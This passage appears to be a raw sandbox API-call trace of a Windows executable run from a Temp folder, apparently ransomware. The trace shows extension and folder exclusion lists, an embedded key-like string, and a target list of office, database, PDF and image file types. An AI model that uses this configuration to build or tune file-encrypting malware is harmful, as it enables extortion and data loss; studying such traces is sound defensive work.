dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) 
returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", 
cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 
[0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 
[0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.864] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0108.864] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0108.864] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0108.864] LockResource (hResData=0x516f58) returned 0x516f58 [0108.864] FreeResource (hResData=0x516f58) returned 0 [0108.864] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.864] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.864] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.864] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14050b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14050b0, cbMultiByte=38, lpWideCharStr=0x13fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.864] FreeResource (hResData=0x50d64c) returned 0 [0108.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14050b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.865] GetCurrentThreadId () returned 0xcc4 [0108.865] GetCurrentThreadId () returned 0xcc4 [0108.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1394258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0108.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1394258, cbMultiByte=97, lpWideCharStr=0x1362ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0108.865] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0108.865] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0108.865] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0108.865] CharLowerBuffW (in: 
lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" 